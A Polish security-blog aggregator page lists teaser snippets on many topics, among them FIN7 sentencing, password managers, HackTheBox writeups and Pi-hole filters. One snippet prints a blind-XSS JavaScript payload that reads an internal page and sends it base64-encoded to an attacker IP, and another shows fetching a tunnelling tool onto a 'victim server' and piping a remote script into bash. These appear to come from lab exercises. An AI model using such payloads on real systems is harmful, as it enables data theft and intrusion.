Serwisy SEC

10 lat więzienia dla cyberprzestępcy z grupy FIN7

10 lat więzienia dla cyberprzestępcy z grupy FIN7

bothunters.pl 3 lat temu Wydano wyrok na 35-latka pochodzenia ukraińskiego, który był członkiem zorganizowanej grupy cyberprzestępczej FIN7. Wyrok to 10 lat pozbawienia wolności. Dodatkowo sędzia nakazał zapłacić 2,5 miliona dolarów odszkodowania. Grupa, w której uczestniczy...
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 3 lat temu Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 3 lat temu Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 3 lat temu Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Sprawdź, czy wyciekł twój telefon

Sprawdź, czy wyciekł twój telefon

rebacze.pl 3 lat temu W weekend świat obiegła informacja, iż dostępna komercyjnie (i w darknecie) baza danych użytkowników Facebooka, zawierająca 533 milionów rekordów, została umieszczona za darmo w sieci. Zawierająca podstawowe informacje użytkowników baza ….
Rozmowa kontrolowana #53. Wywiad dla Z3S

Rozmowa kontrolowana #53. Wywiad dla Z3S

randomseed.pl 4 lat temu W świąteczną niedzielę redaktorzy serwisu Zaufana Trzecia Strona – Adam Haertle i Adam Lange – przeprowadzili wielotematyczną rozmowę z Pawłem Wilkiem. Można posłuchać i pooglądać odpowiedzi dotyczących programowania zorientowanego na dane, eDiscover...
Menedżer haseł: wszystko, co musisz wiedzieć o bezpiecznym zarządzaniu hasłami

Menedżer haseł: wszystko, co musisz wiedzieć o bez...

kwestiabezpieczenstwa.pl 4 lat temu Jak zabezpieczyć swoje hasła przy pomocy menedżera haseł? Jak działają menedżery, co oferują, jak ich używać, który wybrać? Sprawdzam.
Infrastruktura IT dla Domu Maklerskiego – case study Navigator S.A.

Infrastruktura IT dla Domu Maklerskiego – case stu...

dataspace.pl 4 lat temu Sprawdź jakie środowisko IT przygotowaliśmy dla jednego z największych graczy w branży finansowej.
Handling Celery events (EN)

Handling Celery events (EN)

vilya.pl 4 lat temu The code used in this article was written for Celery 5.0.5 but it should work with older versions as well (4.1.1 and higher). It’s available on GitHub. According to the Celery official documentation, a worker is able to generate...
Blind XSS Data Exfiltration

Blind XSS Data Exfiltration

blaszczakm.blogspot.com 4 lat temu cat 2.js var xhr=new XMLHttpRequest(); xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false); xhr.send();var xhr2=new XMLHttpRequest(); xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false); xhr2.send(); └...
Firestore - tworzenie, modyfikowanie i usuwanie danych

Firestore - tworzenie, modyfikowanie i usuwanie da...

fsgeek.pl 4 lat temu Przy bazie danych równie istotne, jak pobieranie danych, jest również ich tworzenie. Do podstawowych operacji możemy zaliczyć tworzenie, edycję i usuwanie dokumentów oraz kolekcji. W przypadku Firestore jest kilka rozwiązań, które mogą zdziwić. Szcze...
Twoje hasła w końcu bezpieczne! Poradnik bezpieczeństwa haseł komputerowych

Twoje hasła w końcu bezpieczne! Poradnik bezpiecze...

kwestiabezpieczenstwa.pl 4 lat temu Jak stworzyć silne, mocne i trudne do złamania hasło? Poznaj TOP 100 najpopularniejszych haseł w Polsce. Dowiedz się, jak łamane są hasła. Czy mierniki i testery siły hasła działają? Po co Ci kostka do gry i dlaczego musisz pamiętać...
Jak zrobić DDOS na ETH?

Jak zrobić DDOS na ETH?

chaindev.pl 4 lat temu
Jak zrobić DDOS na ETH?

Jak zrobić DDOS na ETH?

chaindev.pl 4 lat temu
Writeup: Maszyna HackTheBox Doctor

Writeup: Maszyna HackTheBox Doctor

whitehatlab.eu 4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.209 3. Skanowanie i rozpoznanie Na początku uruchomiłem skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najbardziej pop...
O WAF – Web Application Firewall z Arturem Pajkertem

O WAF – Web Application Firewall z Arturem Pajkert...

maciejkuchnik.pl 4 lat temu W tym odcinku Artur Pajkert wprowadza nas w zagadnienia związane z Web Application Firewall. W ponad godzinnym odcinku, Artur opowiada o rozwiązaniu, które każdego dnia chroni strony hostowane na cyberfolks.pl.
New Cheatsheet XSS 2021

New Cheatsheet XSS 2021

blaszczakm.blogspot.com 4 lat temu https://netsec.expert/posts/xss-in-2021/
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

bdabek.pl 4 lat temu Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

bdabek.pl 4 lat temu Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
"Nie będziemy negocjować" - casus CD Projekt RED

"Nie będziemy negocjować" - casus CD Projekt RED

sasmaczyliblogbezpiecznika.blogspot.com 4 lat temu Najpierw parę faktów 09.02.2021 roku CD Projekt RED poinformował, iż został zhakowany, część urządzeń zaszyfrowana, skradzione zostały kody źródłowe kluczowych gier oraz duża ilość dokumentów.Przestępcy zażądali okupu grożąc ujawnieniem skradzionych...
Writeup: Maszyna HackTheBox Worker

Writeup: Maszyna HackTheBox Worker

whitehatlab.eu 4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.203 3. Skanowanie i rozpoznanie Na początku użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Worker] └──╼...
Writeup: Maszyna HackTheBox Omni

Writeup: Maszyna HackTheBox Omni

whitehatlab.eu 4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.204 3. Skanowanie i rozpoznanie Na początek użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Other/Omni] └──╼ $nm...
TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

TCP/UDP reverse tunnel, transported over HTTP, sec...

blaszczakm.blogspot.com 4 lat temu #### CHISEL INSTALL curl https://i.jpillora.com/chisel! | bash ## copy to victim server: www-data@passage:/tmp$ wget http://10.10.14.143/chisel wget http://10.10.14.143/chisel --2021-01-25 08:55:34-- http://10.10.14.143/chisel Connecting to 10.10.1...
Red Team Notes 2.0

Red Team Notes 2.0

blaszczakm.blogspot.com 4 lat temu https://dmcxblue.gitbook.io/red-team-notes-2-0/
Pihole – Cert Hole itp

Pihole – Cert Hole itp

antynet.pl 4 lat temu DNS Hole od kilkunastu lat jest wykorzystywane do wielu celów. Zwykle do blokowania reklam na portalach, usług śledzących itp. Jednakże dożyliśmy takich czasów, iż DNS Hole coraz częściej wykorzystywane jest do zapewnienia bezpieczeństwa użytkownikó...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

bdabek.pl 4 lat temu Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

bdabek.pl 4 lat temu Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Serwery dla integratora systemu ERP enova365 – case study COM@COM

Serwery dla integratora systemu ERP enova365 – cas...

dataspace.pl 4 lat temu Systemy ERP są krwioobiegiem nowoczesnej firmy, żeby działały w sposób optymalny muszą dysponować odpowiednią infrastrukturą - sprawdź jakie środowisko przygotowaliśmy dla integratora COM@COM.
Pihole – regexp

Pihole – regexp

antynet.pl 4 lat temu Jeśli ktoś korzysta z PiHole to podaję swoje regexp. Opracowane na podstawie własnych analiz ruchu itp. Domeny wyłapane w ruchu ISP Debacom Zabrze: [0-9a-za-z]{13-18}\.tickets [0-9a-za-z]{13-18}\.blackfriday v1\.[a-uw-z]{7}\.ru v[12]{1}\.[a-uw-z]{7}\...
Random:view #003 – Crosscast Cyber, Cyber… 113: Rozmowa z kocem o mRNA

Random:view #003 – Crosscast Cyber, Cyber… 113: Ro...

randomseed.pl 4 lat temu Rozmowa Mirosława Maja i Łukasza Jachowicza z Pawłem Wilkiem na temat reverse engineeringu szczepionki przeciwko SARS-CoV-2 w ramach podcastu Cyber, Cyber… Fundacji Bezpieczna Cyberprzestrzeń.
MAC address c8:93:46 – ZeverSolar

MAC address c8:93:46 – ZeverSolar

antynet.pl 4 lat temu Robiłem porządki w swojej sieci domowej. Napotkałem na problem, adres mac: c8:93:46:36:10:1c Gadatliwe to nie było, porty pozamykane. MAC address określał producenta: "MXCHIP Company Limited" Wiele to nie dało, poza tym iż trop kierował na IoT. Poni...
Kalendarium - przegląd wydarzeń z 2020 roku

Kalendarium - przegląd wydarzeń z 2020 roku

zawszeczujni.pl 4 lat temu 2020 rok już za nami, dlatego zdecydowaliśmy się przypomnieć naszym czytelnikom niektóre ważne wydarzenia dotyczące służb specjalnych oraz branży IT, tworząc mini kalendarium 2020 roku:
Ataki AIR-FI. RAM jako nadajnik radiowy

Ataki AIR-FI. RAM jako nadajnik radiowy

randomseed.pl 4 lat temu Szyny danych w pamięciach RAM współczesnych komputerów osiągnęły takie częstotliwości pracy, iż możliwe jest używanie ich w roli nadajników radiowych, a co za tym idzie wykorzystywanie do wykradania danych, choćby wtedy, gdy komputer jest odłączony o...
PfSense – repo oficjalne BSD

PfSense – repo oficjalne BSD

antynet.pl 4 lat temu /etc/pkg/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/pfSense.conf –> ustaw enabled na yes.
Reverse engineering kodu źródłowego szczepionki. BioNTech / Pfizer SARS-CoV-2

Reverse engineering kodu źródłowego szczepionki. B...

randomseed.pl 4 lat temu Witaj! W tym poście będziemy przyglądali się znak po znaku kodowi źródłowemu szczepionki BioNTech / Pfizer SARS-CoV-2 mRNA.
POIT 099: Podsumowanie 2020

POIT 099: Podsumowanie 2020

feeds.buzzsprout.com 4 lat temu Witam w dziewięćdziesiątym dziewiątym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest podsumowanie roku 2020.Dziś moim gościem jest Grzegorz Kotfis – programista z wieloletnim doświadczeniem najsilniej związany z technologią ....
Writeup: Maszyna HackTheBox SneakyMailer

Writeup: Maszyna HackTheBox SneakyMailer

whitehatlab.eu 4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.197 3. Skanowanie i rozpoznanie Na początku uruchomiłem skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najbardziej pop...
Intercept http2 (grpc) in BURP SUITE PROXY

Intercept http2 (grpc) in BURP SUITE PROXY

blaszczakm.blogspot.com 4 lat temu as root: iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080 adduser mitmproxyuser cat /etc/nghttpx/nghttpx.conf (downstream config) frontend=0.0.0.0,8080;no-tls backend=127....
Forward local connections to local BURP PROXY / MITM PROXY

Forward local connections to local BURP PROXY / MI...

blaszczakm.blogspot.com 4 lat temu 0) sysctl -w net.ipv4.ip_forward=1 sysctl -w net.ipv6.conf.all.forwarding=1sysctl -w net.ipv4.conf.all.send_redirects=0 1) iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080 2) useradd --cr...
Virtualbox + 4k (3840x2160) resolution on guest

Virtualbox + 4k (3840x2160) resolution on guest

blaszczakm.blogspot.com 4 lat temu PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160" PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution Value: 3840,2160 PS C:\Program Fil...
Środowisko IT do monitorowania Ziemi – case study Europejska Agencja Kosmiczna

Środowisko IT do monitorowania Ziemi – case study ...

dataspace.pl 4 lat temu "Fly me to the moon..." - zrobiliśmy to, pozyskaliśmy pierwsze zlecenie w kosmosie. Zobacz jak współpracujemy z Europejską Agencją Kosmiczną.
Lista popularnych wyszukiwarek i narzędzi do rekonesansu by Zwirek

Lista popularnych wyszukiwarek i narzędzi do rekon...

antynet.pl 4 lat temu Elegancka lista 😉 https://zwirek.eu/2020/11/25/wyszukiwarki/ .
Szczepionka na COVID-19 - wyzwaniem dla bezpieczeństwa

Szczepionka na COVID-19 - wyzwaniem dla bezpieczeń...

sasmaczyliblogbezpiecznika.blogspot.com 4 lat temu Szczepionka na COVID-19 niewątpliwie stała się tematem numer jeden na koniec tego roku, a z całą pewnością w 2021 roku będziemy słyszeć o niej jeszcze dużo.Z reguły dyskutuje się o jej skuteczności czy też bezpieczeństwie użycia dla pacjenta (i...
Writeup: Maszyna HackTheBox Buff

Writeup: Maszyna HackTheBox Buff

whitehatlab.eu 4 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.198 3. Skanowanie i rozpoznanie Na początku użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff] └──╼ $...
Obsługa zwrotek w celu podwyższenia efektywności kolejnych mailingów

Obsługa zwrotek w celu podwyższenia efektywności k...

payload.pl 4 lat temu Co się stanie, gdy na milion adresów, na które wyślemy mailing reklamowy, połowa będzie już dawno nieaktywna? Zmarnujemy połowę czasu w jego wysyłanie, ale przede wszystkim open rate takiego mailingu będzie o połowę niższy. Jak takiemu marnotrawstwu ...
Windows 10. Wolny Transfer w otoczeniu sieciowym. SMB

Windows 10. Wolny Transfer w otoczeniu sieciowym. ...

antynet.pl 4 lat temu Skuteczne rozwiązanie: PowerShell Set-SmbClientConfiguration -EnableBandwidthThrottling 0 -EnableLargeMtu 1 Set-SmbServerConfiguration -EnableLeasing $false NET STOP SERVER NET START SERVER.
Writeup: FlareOn 2020: 008 - Aardvark

Writeup: FlareOn 2020: 008 - Aardvark

whitehatlab.eu 4 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiot zadania stanowi plik ttt2.exe. 3. Inspekcja pliku ttt2.exe Zweryfikowałem plik narzędziem file: $ file ttt2.exe ttt2.exe: PE32+ executable (GUI) x86-64, for MS Wind...
POIT 095: Bezpieczeństwo aplikacji

POIT 095: Bezpieczeństwo aplikacji

feeds.buzzsprout.com 4 lat temu Witam w dziewięćdziesiątym piątym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest bezpieczeństwo aplikacji.Dziś moim gościem jest Andrzej Dyjak – architekt bezpieczeństwa z kilkunastoletnim doświadczeniem, aktywny konsultant, ...
EEG spienione goni fale. Eksperyment medytacyjny z opaską Muse 2

EEG spienione goni fale. Eksperyment medytacyjny z...

randomseed.pl 4 lat temu Z roku na rok pojawia się coraz więcej urządzeń pozwalających w domowych warunkach dokonywać pomiarów bioelektrycznej czynności mózgu. Wykorzystuje się w nich zjawisko powstawania fal mózgowych o różnych częstotliwościach, zależnych od aktualnej kond...
AMD EPYC w serwerze do obsługi hostów głosowych – case study Vee SA

AMD EPYC w serwerze do obsługi hostów głosowych – ...

dataspace.pl 4 lat temu Czy zastosowanie nowoczesnego procesora AMD Epyc może obniżyć koszty eksploatacji środowiska IT? Przeczytaj o naszej nowej realizacji dla Vee SA.

Popularne

Cyberprzestępcy chcą ci ukraść konto na Spotify

Cyberprzestępcy chcą ci ukraść konto na Spotify

5 dni temu 91
Czy da się grać na Windows Server?

Czy da się grać na Windows Server?

5 dni temu 85
Uwaga na fałszywe maile od “Poczty Polskiej” – oszuści kuszą Thermomixem!

Uwaga na fałszywe maile od “Poczty Polskiej” – oszuści kuszą...

5 dni temu 81
Aktualizacje aplikacji płatniczych – dlaczego powinno się o nie zadbać?

Aktualizacje aplikacji płatniczych – dlaczego powinno się o ...

5 dni temu 81
Microsoft przedstawia Windows 11 Insider Preview Build 27823

Microsoft przedstawia Windows 11 Insider Preview Build 27823...

5 dni temu 79
English (US) English (US) · Polish (PL) Polish (PL) · Russian (RU) Russian (RU) ·
Kontakt · Regulamin · O nas ·

© Społeczność PAYLOAD 2025. Wszelkie prawa zastrzeżone.